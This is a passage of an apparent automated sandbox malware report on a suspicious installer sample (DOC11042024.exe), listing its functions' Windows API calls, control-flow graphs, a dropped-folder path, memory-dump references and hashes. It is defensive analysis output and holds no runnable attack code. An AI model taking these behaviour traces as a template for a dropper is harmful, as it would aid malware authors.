                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213,?,00000000,000000F0), ref: 00401630
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213, xrefs: 00401623
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                              • String ID: C:\Users\user\AppData\Roaming\turkeyism\beredskabscentre\Tiderip213
                                                                              • API String ID: 3751793516-2216720624
                                                                              • Opcode ID: 975226fb0c416a0e9a9a04af07cb24f02f9ef1002bec1a240e2f962c4c9cb88c
                                                                              • Instruction ID: 79b31bfa1d2e89388c49ab334e25834a0381d0f22240c1f8f53d01e6de203b65
                                                                              • Opcode Fuzzy Hash: 975226fb0c416a0e9a9a04af07cb24f02f9ef1002bec1a240e2f962c4c9cb88c
                                                                              • Instruction Fuzzy Hash: 4911A331A04111EBDB206FA1CD4499E3BA0EF05365B244537E991B62E1D6394981DB5D
                                                                              Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 673 401bca-401be2 call 402ab3 * 2 678 401be4-401beb call 402ad0 673->678 679 401bee-401bf2 673->679 678->679 681 401bf4-401bfb call 402ad0 679->681 682 401bfe-401c04 679->682 681->682 685 401c06-401c1a call 402ab3 * 2 682->685 686 401c4a-401c74 call 402ad0 * 2 FindWindowExW 682->686 697 401c3a-401c48 SendMessageW 685->697 698 401c1c-401c38 SendMessageTimeoutW 685->698 696 401c7a 686->696 699 401c7d-401c80 696->699 697->696 698->699 700 401c86 699->700 701 40295d-40296c 699->701 700->701
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52f4d4622d5b556f3db6b94c676b28452a5fe3dd9bf5f3cdc56a47c5b8eac1a3
                                                                              • Instruction ID: 242dffae23b960cd8007ea5fea3b51ba7af3559057b5bd4d34745741baaae21e
                                                                              • Opcode Fuzzy Hash: 52f4d4622d5b556f3db6b94c676b28452a5fe3dd9bf5f3cdc56a47c5b8eac1a3
                                                                              • Instruction Fuzzy Hash: 1F21A771A44109BEDF11AFB0D94AEBD7B75EF40304F10003AF502B61D1D6B88581DB59
                                                                              Function 00405D6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 704 405d6f-405da1 RegOpenKeyExW 705 405de3-405de6 704->705 706 405da3-405dc2 RegQueryValueExW 704->706 707 405dd0 706->707 708 405dc4-405dc8 706->708 709 405dd3-405ddd RegCloseKey 707->709 708->709 710 405dca-405dce 708->710 709->705 710->707 710->709
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405D99
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DBA
                                                                              • RegCloseKey.KERNELBASE(?,?,00405FE2,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405DDD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID: : Completed
                                                                              • API String ID: 3677997916-2954849223
                                                                              • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                              • Instruction ID: c8ee26f0234ae3d14e289cc77e10cc9d36824a3ef9a7f3edfbe3af592424d1af
                                                                              • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                              • Instruction Fuzzy Hash: BD011E3155010AEADB218F55ED09EEB3BA8EF85350F004436F905D6260D335D964DBB6
                                                                              Function 00405B5A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 711 405b5a-405b66 712 405b67-405b9b GetTickCount GetTempFileNameW 711->712 713 405baa-405bac 712->713 714 405b9d-405b9f 712->714 716 405ba4-405ba7 713->716 714->712 715 405ba1 714->715 715->716
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 00405B78
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040331A,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405B93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-44229769
                                                                              • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                              • Instruction ID: 3ac6a1c09a9d34b10d8784815f95151ee17cf1dee6e8f99d7d7fa5b9a712cca1
                                                                              • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                                              • Instruction Fuzzy Hash: 78F03076A00214BBDB008F5ADD45A9BB7BCEF95710F10803AEA05F7290E6B4BE54CB64
                                                                              Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000,?), ref: 0040518E
                                                                                • Part of subcall function 00405156: lstrlenW.KERNEL32(00402D2A,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D2A,00000000), ref: 0040519E
                                                                                • Part of subcall function 00405156: lstrcatW.KERNEL32(Completed,00402D2A,00402D2A,Completed,00000000,00000000,00000000), ref: 004051B1
                                                                                • Part of subcall function 00405156: SetWindowTextW.USER32(Completed,Completed), ref: 004051C3
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004051E9
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405203
                                                                                • Part of subcall function 00405156: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405211
                                                                                • Part of subcall function 00405624: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405649
                                                                                • Part of subcall function 00405624: CloseHandle.KERNEL32(?), ref: 00405656
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                              • String ID:
                                                                              • API String ID: 3585118688-0
                                                                              • Opcode ID: 84a180ffa949ae4b47635f46727b4e5f20e2cbb422a7b67372bd3b04837dfc10
                                                                              • Instruction ID: d4a90fdd3db56c34d18a551939a782557260df8239dd5c90dac8a9624580c158
                                                                              • Opcode Fuzzy Hash: 84a180ffa949ae4b47635f46727b4e5f20e2cbb422a7b67372bd3b04837dfc10
                                                                              • Instruction Fuzzy Hash: E811A131E04208EBDF10AFA0CD449DE7AB5EB04355F20447BE605B62E0C7794A82DB99
                                                                              Function 00405624 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405649
                                                                              • CloseHandle.KERNEL32(?), ref: 00405656
                                                                              Strings
                                                                              • Error launching installer, xrefs: 00405637
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateHandleProcess
                                                                              • String ID: Error launching installer
                                                                              • API String ID: 3712363035-66219284
                                                                              • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                              • Instruction ID: 0cf8600e4f91796faddf13b18257139f8cbd6d0f6b13f3e554d193e10cff01d4
                                                                              • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                              • Instruction Fuzzy Hash: 88E0E6B4A01209AFDB009F64EC4996B777CE710744B908921A915F2250D774D4108A79
                                                                              Function 004032E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00406199
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,?,?,00000000), ref: 004061A8
                                                                                • Part of subcall function 00406136: CharNextW.USER32(?,"C:\Users\user\Desktop\DOC11042024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061AD
                                                                                • Part of subcall function 00406136: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004032F4,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 004061C0
                                                                              • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,004034D4), ref: 00403309
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 4115351271-2030658151
                                                                              • Opcode ID: 2ec91ac65976baf29333d001683f802e10f31075cc742f321c5f6d3f2165e938
                                                                              • Instruction ID: e9b08fedfb55d49ca3acf058f4934da210e180d0de9b375c3427e63d116d49ff
                                                                              • Opcode Fuzzy Hash: 2ec91ac65976baf29333d001683f802e10f31075cc742f321c5f6d3f2165e938
                                                                              • Instruction Fuzzy Hash: C1D0C72190693175C55537263D16FCF151C5F1636AF125477F80A751C1CB7C194245FE
                                                                              Function 0040692C Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38ac597608f2b0135486df2f194b5299640307e0aff715a2548ebc85a366a8b3
                                                                              • Instruction ID: 514215012d807dac5c02b099702ee1b640487acce8dcd31e9022cfa1c5c92198
                                                                              • Opcode Fuzzy Hash: 38ac597608f2b0135486df2f194b5299640307e0aff715a2548ebc85a366a8b3
                                                                              • Instruction Fuzzy Hash: 2CA15471E00228DBDF28CFA8C8447ADBBB1FF44305F15842AD856BB281D3786A96CF44
                                                                              Function 00406B2D Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fef29820703342f0d36661d4b7a1bb0a8ca566ed46be5046b660279d11318d2b
                                                                              • Instruction ID: f9a29c317f0b65048224f427f587678b851063c9d42b2dc7dbc2af42e1c1c160
                                                                              • Opcode Fuzzy Hash: fef29820703342f0d36661d4b7a1bb0a8ca566ed46be5046b660279d11318d2b
                                                                              • Instruction Fuzzy Hash: 17914470D04228CBDF28CF98C8447ADBBB1FF44305F15812AD852BB281D7786A96DF48
                                                                              Function 00406843 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054693151.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_DOC11042024.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7e334cff55d188459d4f5ad777606bb6e0fa390321f0c06170d0674af379beb9
                                                                              • Instruction ID: b3739fc903129aefda3f0dc59f21d1d1e8c42473030778f70acd831c52ff2ff8
                                                                              • Opcode Fuzzy Hash: 7e334cff55d188459d4f5ad777606bb6e0fa390321f0c06170d0674af379beb9
                                                                              • Instruction Fuzzy Hash: 73814571E00228DBDF24CFA8C884BADBBB1FF44305F25816AD456BB291D7385A96CF14
                                                                              Function 00406348 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2054540974.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2054528469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054554787.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2054572107.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
